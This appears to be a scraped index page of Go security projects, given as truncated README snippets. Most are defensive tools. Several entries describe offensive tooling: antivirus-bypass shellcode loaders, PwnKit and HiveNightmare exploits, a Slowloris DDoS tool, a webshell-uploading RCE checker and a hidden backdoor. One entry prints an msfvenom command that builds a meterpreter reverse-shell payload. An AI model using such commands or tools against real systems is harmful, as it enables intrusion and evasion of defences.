438 Resources
🐸 Frog For Automatic Scan 🐶 Doge For Defense Evasion&Offensive Security Doge-sRDI Shellcode implementation of Reflective DLL Injection by Golang. Co
🔮 ✈️ to integrate OPA Gatekeeper's new ExternalData feature with cosign to determine whether the images are valid by verifying their signatures
Framework Laptop UEFI Secure Boot Certificates Source: Extracted from a live machine (FRANBMCP08) Date: 2021-10-21 KEK (Key Exchange Key) This certifi
SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities Why?
linenoise linenoise is a library that generates strings of random characters (herein called a "noise") that can be used as reasonably secure passwords
Velociraptor - Endpoint visibility and collection tool. Velociraptor is a tool for collecting host based state information using The Velociraptor Quer
decept-agent 代码结构 agent 客户端相关代码 bait 诱饵蜜签管理 conf 探针配置 log 日志 proxy 代理管理 github.com golang.org gopkg.in 第三库的引入 util 公共工具 comm 公用代码 基本使用
CoyIM - a safe and secure chat client CoyIM is a new client for the XMPP protocol. It is built upon https://github.com/agl/xmpp-client and https://git
wf What This is a package for controlling the Windows Filtering Platform (WFP), also known as the Windows firewall. See its docs: https://godoc.org/in
proto-find proto-find is a tool for researchers that lets you find client side prototype pollution vulnerability. How it works proto-find open URL in
这是什么 一个用go实现的iOS重签名模块,即市面上的iOS超级签名、蒲公英ios内测分发原理 使用本模块可以进行基本的IPA安装包重签名分发 实现功能:苹果开发者账号管理、IPA安装包管理 前提 1.生成ios.csr和ios.key文件 openssl genrsa -out
hotdog-localstack-PoC PoC for running AWS services(kinesis, dynamodb, lambdas) locally with Localstack alias awslocal="aws --endpoint-url=http://local
HiveNightmare this is a quick and dirty exploit for HiveNightmare (or SeriousSam) - CVE-2021–36934 This allows non administrator users to read the SAM
scanogram Scan your pictures and videos for corruption, and sort them by EXIF or modification time. Introduction This tool is a fast and lightweight s
Dent More Information If you want to learn more about the techniques utlized in this framework please take a look at this article. Description This fr
hashfs Implementation of io/fs.FS that appends SHA256 hashes to filenames to allow for aggressive HTTP caching.
Monmind - obfuscate multiple strings & hide text from binary searching Obfuscation strings in golang code INSTALL You can install monmind by running:
🤖 security-slacker Pokes users on Slack about outstanding risks found by Crowdstrike Spotlight or vmware Workspace ONE so they can secure their own e
blackCatConf blackCatConf is a static configuration extractor implemented in Golang for BlackCat Ransomware (targeting Microsoft Windows and GNU/Linux
Ruijie Networks RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。同时也可以上传冰蝎马或者哥斯拉马。批量检测支持并发。
Intro A GUI Offline Tool for decrypting and manipulating *.md files used by repique and dnscrypt proxy It's targeted for creating your own DoT, DoH an
PHC Crypto Inspired by Upash, also implementing PHC string format Usage Currently there are two options of using this package: Import all Import speci
zauth zauth is a 2FA (Two-Factor Authentication) application for terminal written in Go. Features Supports both TOTP and HOTP codes. Add new entries d
🔍 Rekor Sidekick Rekor Sidekick monitors a Rekor signature transparency log and
csrf Package csrf is a middleware that generates and validates CSRF tokens for Flamego.
amcs(apple mobile config signature) sign Apple’s mobileconfig file to solve the ‘unsigned’ problem the project rely openssl https://github.com/openssl
DEPRECATED This repository started as a good idea but I didn't have enough time or desire to work on it. So, it's left here for historical / education
Description The Pointer was developed for hunting and mapping Cobalt Strike servers exposed to the Internet. The tool includes the complete methodolog
Welcome to go-sec-code 👋 Go-sec-code is a project for learning Go vulnerability code. 🏠 Homepage Introduction 用beego作为后端框架开发的go语言靶场,目前已经完成 commandIn
avbypass 使用 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin 使用程序生成加密的shellcode后,填入指定位置,编译执行即可。
ID Obfuscation/Hashing Transformer for Go There are many times when you want to generate obfuscated ids. This package utilizes Knuth's Hashing Algorit
encembed Encrypt embedded resource in compiled binary using age. Meant for usage with go generate. This tool will generate a go source file that embed
Log4jDetect WhiteSource Log4j Detect is a free CLI tool that quickly scans your projects to find vulnerable Log4j versions containing the following kn
sucksAV This project used to learn golang and try to bypass AV 描述 基于Golang开发的BypassAV,采取的shellcode分离技术,将shellcode注入到图片中,通过加载器进行加载,使用Golang动态加载技术 需要使用第
Golang Scanner Contoh pembuatan aplikasi Java menggunakan BlueJ cek disini, tetapi berikut ini adalah versi rebuild dari Java ke Golang, dengan menggu
windows PC端wxapkg解密 说明 由于不想安装安卓模拟器去提取wxapkg包,windows PC端的微信也支持小程序,但是PC端的wxapkg是被加密存储的。该项目是把wxapkg解密。目前微信PC版本为:2.9.5.31. 使用方法 pc_wxapkg_decrypt.exe -wx
go-opa-validate go-opa-validate is an open-source lib that evaluates OPA (open policy agent) policy against JSON or YAML data. Installation Usage Cont
Harness Drone/CIE SonarQube Plugin with Quality Gateway The plugin of Harness Drone/CIE to integrate with SonarQube (previously called Sonar), which i
zipExec_unpack A simple unpacking tool for the zipExec Crypter by Tylous. Since this Crypter will likely be used for malicious purposes sooner rather
aisap AppImage SAndboxing Project: a Golang library to help sandbox AppImages with bwrap What is it? aisap intends to be a simple way to implement And
DevPops continues my research on companion worms. It is a friendly companion without payload and without modifying any source files. The spreading vectors are gits.
Step Security Agent Purpose-built security agent for hosted runners To pilot it, add the following code to your GitHub Actions workflow file as the fi
Hotdog Hotdog is a set of OCI hooks used to inject the Log4j Hot Patch into containers. How it works When runc sets up the container, it invokes hotdo
SerpScan Serpscan is a powerful PHP tool designed to allow you to leverage the power of dorking straight from the comfort of your command line. Table
hashring Consistent hashing hashring implementation. Overview This is an implementation of the consistent hashing hashring data structure. In general,
Decker - Penetration Testing Orchestration Framework Purpose Decker is a penetration testing orchestration framework. It leverages HashiCorp Configura
slowloris - Golang distributed Slowloris attack How it works Read the article 🦷 How to protect from it TBD Installation Run go install github.com/its
Scan systems and docker images for potential spring4shell vulnerabilities. Will detect in-depth (layered archives jar/zip/tar/war and scans for vulnerable Spring4shell versions. Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.
PwnKit-go-LPE (CVE-2021-4034) A golang based exp for CVE-2021-4034 dubbed pwnkit @@@@@@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@@
go-PwnKit A pure-Go implementation of the CVE-2021-4034 PwnKit exploit. Installation git clone [email protected]:OXDBXKXO/go-PwnKit.git cd go-PwnKit make
Vishnu(The Hidden Backdoor) RS{JOIN_REDTEAM} Taken from the Trimurit, the triple deity of supreme divinity. Vishnu is known as "The Preserver". This p